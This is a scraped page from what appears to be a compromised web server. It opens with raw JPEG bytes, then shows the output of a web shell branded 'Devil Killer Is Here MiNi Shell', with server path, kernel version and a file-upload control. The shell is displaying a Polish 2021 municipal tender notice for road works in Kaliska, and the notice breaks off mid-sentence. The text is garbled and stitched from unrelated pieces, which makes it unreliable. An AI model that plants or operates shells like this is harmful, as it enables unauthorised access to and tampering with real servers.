JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211012/0022892601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Utwardzenie ulicy Przemysłowej w Kaliskach”w formule „Zaprojektuj i wybuduj” w ramach operacji typu „Budowa lub modernizacja dróg lokalnych” objętych PROW na lata 2014 - 2020 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kaliska</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675698</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowowiejska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kaliska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-260</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">585889201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">585889206</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kaliska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kaliska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Utwardzenie ulicy Przemysłowej w Kaliskach”w formule „Zaprojektuj i wybuduj” w ramach operacji typu „Budowa lub modernizacja dróg lokalnych” objętych PROW na lata 2014 - 2020 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6fc99c02-2a70-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00228926</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001134/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.26 Utwardzenie ulicy Przemysłowej w Kaliskach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie realizowane w ramach operacji typu „Budowa lub modernizacja dróg lokalnych” w ramach poddziałania „Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii” objętego PROW na lata 2014 - 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kaliska <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://www.platformazakupowa.pl/pn/kaliskaW celu skrócenia czasu udzielenia odpowiedzi na pytania<br/>preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem<br/>https://platformazakupowa.pl/pn/kaliska (po wyszukaniu odpowiedniego postępowania) poprzez<br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego. Z uwagi na ograniczenie ilości znaków w niniejszym<br/>ogłoszeniu Szczegółowe warunki opisane zostały w SWZ !!Zamawiający będzie kontaktował się z<br/>Wykonawcami za pomocą : https://www.platformazakupowa.pl/pn/kaliska</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający będzie przekazywał Wykonawcom informacje za<br/>pośrednictwemhttps://platformazakupowa.pl/pn/kaliska. Informacje dotyczące odpowiedzi na<br/>pytania,zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami<br/>adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem<br/>https://platformazakupowa.pl/pn/kaliska do konkretnego Wykonawcy.Wykonawca jako podmiot<br/>profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/pn/kaliska przesłanych przez Zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.Oferta, wniosek oraz przedmiotowe<br/>środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/>elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W<br/>procesie<br/>składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany<br/>podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na<br/>dokumencie, który następnie przesyła do systemu.W przypadku wykorzystania formatu podpisu<br/>XAdES<br/>zewnętrzny, Zamawiający wymaga dołączenia odpowiedniej ilości plików, tj. podpisywanych plików z<br/>danymi oraz plików XAdES.Zgodnie z art. 18 ust. 3 PZP, nie ujawnia się informacji stanowiących<br/>tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli<br/>Wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że<br/>nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone<br/>informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje<br/>się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę<br/>przedsiębiorstwa.Wykonawca, za pośrednictwem https://platformazakupowa.pl/pn/kaliska może przed<br/>upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub<br/>wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. Każdy z Wykonawców może złożyć tylko jedną<br/>ofertę. Złożenie większej liczby ofert lub oferty zawierającej propozycje wariantowe podlegać będzie<br/>odrzuceniu.Ceny oferty muszą zawierać wszystkie koszty, jakie musi ponieść Wykonawca, aby<br/>zrealizować zamówienie z najwyższą starannością oraz ewentualne rabaty.Zamawiający rekomenduje<br/>wykorzystanie formatów: .pdf, .doc, .docx, .xls, .xlsx, .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>rozszerzeń:.zip,.7Z.Wśród rozszerzeń powszechnych, a niewystępujących w Rozporządzeniu KRI<br/>występują: .rar, .gif, .bmp, .numbers, .pages. Dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie.Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych<br/>profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików<br/>podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi<br/>maksymalnie 5MB.<br/>Z uwagi na ograniczenie ilości znaków w niniejszym ogłoszeniu Szczegółowe<br/>warunki opisane zostały w SWZ !!</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani / Pana danych osobowych<br/>jest Gmina Kaliska reprezentowana przez Wójta Gminy Kaliska z siedzibą w Kaliskach, ul.<br/>Nowowiejska<br/>2, 83-260 Kaliska;2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się pod<br/>adresem e – mail: iod@kaliska.pl, 3) Pani / Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie podstawowym bez negocjacji (art. 275 ust. 1 ustawy PZP),4)<br/>odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy PZP,5) Pani / Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy,6) obowiązek podania przez Panią / Pana danych<br/>osobowych bezpośrednio Pani / Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego,7) w odniesieniu do Pani / Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO,8) posiada Pani / Pan:a) na podstawie art. 15<br/>RODO prawo dostępu do danych osobowych Pani / Pana dotyczących (w przypadku, gdy skorzystanie<br/>z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani<br/>/ Pan zobowiązania do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia),b)<br/>na podstawie art. 16 RODO prawo do sprostowania Pani / Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników),c) na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania<br/>postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w<br/>art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw<br/>innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej<br/>lub państwa członkowskiego),d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani / Pan, że przetwarzanie danych osobowych Pani / Pana dotyczących<br/>narusza przepisy RODO,9) nie przysługuje Pani / Panu:a) w związku z art. 17 ust. 3 lit b, d lub e RODO<br/>prawo do usunięcia danych osobowych,b) prawo do przenoszenia danych osobowych, o których mowa<br/>w art. 20 RODO,c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani / Pana danych osobowych jest art. 6 ust. 1 lit. C<br/>RODO,10) przysługuje Pani / Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani / Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zadanie pn. „Utwardzenie ulicy Przemysłowej<br/>w Kaliskach” w związku z otrzymaną pomocą dla operacji typu „Budowa lub modernizacja dróg<br/>lokalnych” w ramach poddziałania „Wsparcie inwestycji związanych z tworzeniem, ulepszaniem<br/>lub rozbudową wszystkich rodzajów małej infrastruktury,<br/>w tym inwestycji w energię odnawialną i w oszczędzanie energii”.<br/>2. Przedmiot zamówienia obejmuje wykonanie prac projektowych oraz robót budowlanych,<br/>polegających na utwardzeniu nawierzchni drogi gminnej – ulicy Przemysłowej.<br/>3. Szczegółowy opis przedmiotu zamówienia przedstawiony został w Programie Funkcjonalno –<br/>Użytkowym (PFU), który stanowi załącznik do niniejszej SWZ.<br/>4. Nie ograniczając się do niżej wymienionych robót, lecz zgodnie ze wszystkimi innymi<br/>określonymi w PFU, w ramach ceny umownej należy wykonać:<br/>1) wszelką dokumentację, która może okazać się niezbędna dla zaprojektowania, budowy i<br/>użytkowania obiektów wchodzących w skład przedmiotu zamówienia,<br/>2) roboty budowlane (zgodnie z wymaganiami określonymi w PFU),<br/>dotyczące w szczególności:,<br/>a) rozbiórki betonowych elementów istniejącej infrastruktury drogowej,<br/>b) adaptację w maksymalnie możliwym zakresie istniejącej konstrukcji nawierzchni gruntowej<br/>utrwalonej jako podbudowy docelowej konstrukcji jezdni z betonu asfaltowego, poprzez jej<br/>właściwe wyprofilowanie, ułożenie warstwy wyrównawczej z mieszanki niezwiązanej z kruszywa,<br/>uzyskanego<br/>w wyniku przekruszenia surowca skalnego litego (z wyłączeniem kruszyw węglanowych);<br/>parametry techniczne nawierzchni gruntowej utrwalonej szczegółowo wskazano w części PFU<br/>dot. aktualnych uwarunkowań wykonania przedmiotu zamówienia,<br/>c) w lokalizacjach, w których w obszarze nowoprojektowanego przebiegu (zgodnie z<br/>załącznikiem graficznym PFU) nawierzchni jezdni trasy głównej ulicy, zjazdów, łącznika czy dróg<br/>podporządkowanych, nie występuje istniejąca konstrukcja nawierzchni gruntowej utrwalonej, o<br/>której mowa w punkcie b powyżej, wykonanie robót ziemnych oraz pełnej konstrukcji w układzie<br/>i grubościach warstw jak wskazano dla istniejącej nawierzchni gruntowej utrwalonej (gr. łącznie<br/>60 cm) jako podbudowy docelowej konstrukcji jezdni z betonu asfaltowego; połączenie nowych i<br/>starych warstw konstrukcyjnych nawierzchni należy wykonać w sposób umożliwiający uzyskanie<br/>tej samej nośności (trwałości zmęczeniowej) obu łączonych części i zapobiegający wystąpieniu<br/>na powierzchni warstw asfaltowych jezdni spękań / pęknięć odbitych od spoin na krawędziach<br/>połączeń,<br/>d) wykonanie utwardzenia nawierzchni ulicy poprzez wykonanie nawierzchni z betonu<br/>asfaltowego w zakresie zgodnym z załączonym do PFU załącznikiem graficznym – koncepcją<br/>projektową oraz warunkami PFU,<br/>e) przebudowę ulicy Przemysłowej i jej skrzyżowań zgodnie z załączonym do PFU załącznikiem<br/>graficznym – koncepcją projektową oraz warunkami PFU,<br/>f) budowę zjazdów na wszystkie nieruchomości mające bezpośredni dostęp do<br/>przebudowywanych ulic w identycznej konstrukcji nawierzchni jak dla trasy głównej,<br/>g) budowę uprzednio zaprojektowanego i uzgodnionego systemu sieci i urządzeń kanalizacji<br/>deszczowej odwadniających korpus drogowy w ciągu przebudowywanej ulicy, przy założeniu<br/>wykorzystania w maksymalnym możliwym stopniu istniejącej infrastruktury sieciowej,<br/>h) regulację wysokościową wszelkich urządzeń sieci uzbrojenia podziemnego terenu<br/>zlokalizowaną w liniach rozgraniczających planowanej inwestycji w celu dostosowania ich<br/>funkcjonalności do nowoprojektowanego zagospodarowania terenu w zakresie rozwiązań<br/>sytuacyjno – wysokościowych,<br/>i) przebudowę kolidujących urządzeń i sieci istniejącej infrastruktury pod i nadziemnej:<br/>• urządzeń energetycznych,<br/>• sieci wodociągowych,<br/>• kanalizacji sanitarnej,<br/>• urządzeń melioracyjnych,<br/>• innych,<br/>o ile w trakcie prac wystąpi konieczność wykonania takiej przebudowy,<br/>j) przestawienie kolidujących z zakresem inwestycyjnym ogrodzeń,<br/>k) oczyszczenie i przeprofilowanie istniejących rowów przydrożnych,<br/>l) wykonanie obustronnych poboczy gruntowych wzmocnionych o szerokości min. 0,75 m,<br/>m) ułożenie warstwy ziemi urodzajnej z obsianiem mieszanką traw,<br/>n) oznakowanie pionowe i poziome ulicy i skrzyżowań oraz wyposażenie drogi w urządzenia<br/>BRD m. in.: wyspowe progi zwalniające w celu ograniczenia prędkości poruszających się<br/>pojazdów,<br/>o) w przypadku ustalenia odmiennych warunków gruntowo wodnych względem dokumentacji<br/>geotechnicznej, udostępnionej przez Zamawiającego, wykonanie robót budowlanych<br/>zapewniających właściwe warunki posadowienia dróg w sposób zapewniający prawidłowe<br/>wykonanie przedmiotu umowy,<br/>p) wykonanie, po zakończeniu robót, pełnej rekultywacji terenów zajętych przez zaplecza<br/>techniczne i socjalne, plac budowy, drogi dojazdowe i wszelkie inne tereny przekształcone przez<br/>Wykonawcę,<br/>q) dokonanie uzgodnień z zarządcami dróg publicznych oraz właścicielami nieruchomości<br/>przyległych do realizowanej inwestycji w zakresie przywrócenia dróg oraz nieruchomości<br/>użytkowanych przez Wykonawcę w czasie budowy do stanu nie gorszego niż przed<br/>rozpoczęciem budowy oraz realizacja ww. zobowiązania,<br/>r) wszelkie roboty wynikające z konieczności połączenia przebudowywanego odcinka z<br/>istniejącym układem komunikacyjnym wraz z jego ewentualną tymczasową przebudową i<br/>zmianą organizacji ruchu wynikające z przyjętych rozwiązań i technologii wykonania robót,<br/>s) wykonanie dokumentacji powykonawczej.<br/>Pełny opis przedmiotu zamówienia zawarty jest w Programie Funkcjonalno Użytkowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Wykonanie prac projektowych oraz robót budowlanych, polegających na utwardzeniu nawierzchni drogi gminnej</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %<br/>2) Okres gwarancji – waga kryterium 30 %<br/>3) Termin płatności faktury – waga kryterium 10 %<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60%<br/>cena najniższa brutto*<br/>C = --------------------------------------------------- x 100 x 60 %<br/>cena oferty ocenianej brutto<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez<br/>Wykonawcę w Formularzu ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Okres gwarancji (OG) – waga 30 %<br/>Okres gwarancji badanej oferty*<br/>OG = --------------------------------------------------------- x 100 x 30 %<br/>Oferta z najdłuższym okresem gwarancji<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta zostanie oceniona w 